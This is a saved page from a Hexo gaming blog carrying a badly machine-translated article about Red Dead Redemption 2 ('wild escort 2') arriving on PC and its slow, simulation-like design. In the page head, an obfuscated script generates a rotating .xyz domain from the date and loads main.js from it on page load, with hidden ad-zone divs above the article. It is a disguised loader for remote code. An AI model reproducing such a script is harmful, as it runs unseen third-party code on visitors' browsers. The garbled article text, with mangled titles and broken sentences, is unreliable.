<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="On October 4, 2019, Rockstar officially announced that its latest 3A masterpiece, the great escort in the wilderness: Redemption 2, will log into the PC platform on November 5.This news is not long, b">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="On October 4, 2019, Rockstar officially announced that its latest 3A masterpiece, the great escort in the wilderness: Redemption 2, will log into the PC platform on November 5.This news is not long, b">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/81825aef7cf14b6db21f5441c6fbec11.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/1e996c7f376041f9861daa16a2d067b9.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/981521699ce54dad8749d4b2fcfd8ffb.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/4e526f38c52042569863caee6b21acaa.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/ab5db32990764417b77c8c09501be3ce.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/7316fe4293cd4ce182342fc65341fb27.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/8fe8b29ada804da29327158bc0196eed.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/56761d049eb34ea19cc38f3c0696faa8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/5136f8fde48d4cf9b9750652ba945edc.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/5ba15a3777ab4b078978628b401b9ccb.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants">
<meta name="twitter:description" content="On October 4, 2019, Rockstar officially announced that its latest 3A masterpiece, the great escort in the wilderness: Redemption 2, will log into the PC platform on November 5.This news is not long, b">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/81825aef7cf14b6db21f5441c6fbec11.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Before wild escort 2 log into PC it's very good, but the player can't give it what he wants | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Before wild escort 2 log into PC it's very good, but the player can't give it what he wants</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>On October 4, 2019, Rockstar officially announced that its latest 3A masterpiece, the great escort in the wilderness: Redemption 2, will log into the PC platform on November 5.<br>This news is not long, but it makes the whole game circle boil. It has been a year since the game was released, but it seems that the discussion heat of the game in China only existed for a period of time when it was first launched, and the period when the online mode “wilderness escort ol” was officially launched. After that, the attention and topic of the game in China almost fell to the freezing point, and even the content update of the major version was rarely discussed The biggest reason is that there is no PC in this game.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/81825aef7cf14b6db21f5441c6fbec11.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>This time, the news that the game is about to land on PC is undoubtedly a good thing for the domestic players, which means that the game may have a high exposure and attention in China like gta5, and for those who really like the game, it must be a mixed story to know the news: to be able to see the game they like It’s a good thing to get more players’ attention. At the same time, “wild escort 2” as a landmark work of the open world in the industry, can also make more players once the style of this game. However, in view of the unique nature of the game itself, it is bound to cause a new round of controversy among the players again, and the focus of the controversy will be the platitude of “gameplay”.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/1e996c7f376041f9861daa16a2d067b9.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"></p>
<p>#What’s good about it?<br>People who often watch overseas entertainment programs should know that in the impression of foreigners, when referring to the film and television related works of Western themes, they always refer to such representative classic works as “guanshanfeidu”, “tiger and leopard little overlord”, “golden three escort” and so on. Compared with the domestic fascinating martial arts children and girls in the Jianghu, I prefer these simple but elegant works Old legends that can be deeply rooted in people’s hearts. A cigarette, a pot of wine, a revolver, riding a steed on the sunset plain, watching the steam train flying across the horizon in the distance, maybe this is the unique romance of those rough and unrestrained tough guys. Although these stories are wonderful, they are not our own stories after all. Therefore, many Chinese people do not have too many emotional elements for these works. In addition, the western theme works are few in the current film and television field, which doomed the minority of this theme in China.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/981521699ce54dad8749d4b2fcfd8ffb.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>The protagonist’s shape in the three golden escort should be the most popular<br>Western theme games have been on the market all the time, from action shooting to simulation management and so on, but they are gradually buried by history as western movies. If it wasn’t r star’s “the big escort in the wilderness”, people’s attention to this theme might have been gone for a long time. In short, if you don’t have a passion for this theme, you won’t be interested in these games, even if the developer is r star.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/4e526f38c52042569863caee6b21acaa.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>The name R-star represents the highest development power of the whole game industry. Each generation of works can be regarded as an industry milestone in concept design and technical ability. And this generation of “big escort in the wilderness: Redemption 2” enables R-star to unite studios all over the world to develop even beyond the scale and treatment of “gta5”. Therefore, this work is not only in the picture performance but also in the game Capacity design is the strongest in this generation. At the same time, the game also has a very wonderful plot. R star always takes “to create a world for telling a story” as the concept, this time is no exception. Throughout the history of R star’s game, it seems that their stories are just like those of Stephen Chow’s films, with a small character as the protagonist, telling a story that is not painful to others, but not painful to themselves There is no absolute heroism in a significant experience, and there will never be so-called peace in the world.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/ab5db32990764417b77c8c09501be3ce.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>R star has always been an unprecedented obsession with the details of the game. No matter the modeling and animation performance of the character or the series of special effects in the scene have reached the abnormal level. For example, the skin and muscle activities of the character and the bulging blood vessels can be seen clearly. Each interaction has script animation effect, or the raindrops under the eaves of the rainy house can even swing with the wind.<br>R star aims to create a near real western world to enhance the immersion of the game. Because everything in the game is so reasonable, players will feel a sense of “all phenomena in the game are reasonable”. Most of the time, players will think in combination with their common sense of life when they make actions, such as eating when they are hungry, Cold to add clothes, horse dirty to brush hair, do not pay attention to personal hygiene will be other NPC away and so on. This kind of thinking mode of the player is combined with the strong picture expressive force of the game, thus forming the “immersion sense” in the player’s impression, so as to achieve the desired game effect of R star.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/7316fe4293cd4ce182342fc65341fb27.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"></p>
<h1 id="double-blade-sword"><a href="#double-blade-sword" class="headerlink" title="double blade sword"></a>double blade sword</h1><p>To sum up, R star has made great efforts in shaping the “reality” of the western world and achieved the effect they have always wanted to achieve, and the biggest advantage of this game has just become the disadvantage of this game. Because the game has almost reached the abnormal level for the restoration of reality, its process is also very lengthy and complex in the actual play process. Take shopping in the store as an example, you can directly select the goods you need on the shelf and directly put them in your pocket to pay for people to leave, or you can go to the counter to browse the catalog of goods to choose. The specific process of the latter is: go to the counter , talk to the boss about the catalog, open the catalog, turn to the section you want to see, pay for the goods, close the book and return it to the boss, and leave the store. In reality, it’s almost the same process to order a dish in the restaurant, but the game has done every step of the operation, which makes the process of shopping in the game become very slow and complex. Some people may say that the way of shopping is very cool and delicate, but more people will say “why is it so troublesome to buy something?”.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/8fe8b29ada804da29327158bc0196eed.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>There are many other designs like this in the game, and this is also the biggest pain point of the game. Some people say that this game is a “cowboy Simulator”. Everything is good but not fun. Maybe in R star’s view, they think so, but it’s just what they want. They don’t care whether the player can be a wild man in the western world like in Los Angeles. They don’t care whether the game can be recognized by the vast majority of players. They just want to fulfill their expectations. The relationship with the word “Simulator” means that the game is destined to become a minority work again. After all, only a small number of people like to seek the truth in the game, but unlike other “simulators”, the “wild escort 2” is a top 3A work completely, and has a strong artistic flavor.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/56761d049eb34ea19cc38f3c0696faa8.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>If you simply like R star’s style of action, development philosophy and players interested in Western themes, you may like this work very much and get the best game experience in the same theme game. As for the players who simply follow the trend, or who want to be a savage in the western world because they like GTA, they may feel disappointed after buying it and run to the community to scold the spicy chicken game. I don’t know why other people give this game a very high evaluation. Ironically, the players who belong to the latter in China may occupy the majority of the shares Well, there will be disputes between the two players. This is the current environment. Fast pace is simple and directly the mainstream. The famous slow pace and authenticity of “wild escort 2” is doomed not to be criticized by the mainstream groups, let alone a few true love fans to easily change this situation.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/5136f8fde48d4cf9b9750652ba945edc.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>    concluding remarks<br>In the understanding of many domestic players, it seems that many of the first-line 3A masterpieces will die suddenly if they don’t get on the PC. this time, the “wild escort 2” will log on to the PC because of its low popularity. It’s necessary to make some money by copying another wave of enthusiasm on the PC. In fact, this is a big misunderstanding. The real reason is that the players’ petition for the PC is too loud, and R star does not want to live up to the expectations of these players this time. After all, the previous generation of works has not launched the PC version until today, but still does not affect the game has a very hot sales and high evaluation.<br><img src="http://maiygu.xyz/2019/11/08/Before wild escort 2 log into PC it's very good, but the player can't give it what he wants/5ba15a3777ab4b078978628b401b9ccb.jpg" alt="Before wild escort 2 log into PC it&#39;s very good, but the player can&#39;t give it what he wants"><br>The previous generation’s work “the great escort in the wilderness: Redemption”<br>For “wild escort 2”, I’m very glad that R star still devoted himself to creating the real virtual world after tasting the sweetness in gta5. After all, the two games are quite different in style. If we add too many entertainment elements similar to those in GTA to “wild escort”, we will lose the original flavor of this theme. Although it’s a controversial work, it’s worth every player who loves the game to try. This time, the login PC also gives a green light to more players. The rest can only hope that this work can dominate the hot sales list like gta5 all the year round.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Before the release of last survivor 2, we need to know how great it was/" rel="next" title="Before the release of last survivor 2, we need to know how great it was">
                <i class="fa fa-chevron-left"></i> Before the release of last survivor 2, we need to know how great it was
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Before Apple, jobs was employee 40 of yadali/" rel="prev" title="Before Apple, jobs was employee 40 of yadali">
                Before Apple, jobs was employee 40 of yadali <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#double-blade-sword"><span class="nav-number">1.</span> <span class="nav-text">double blade sword</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
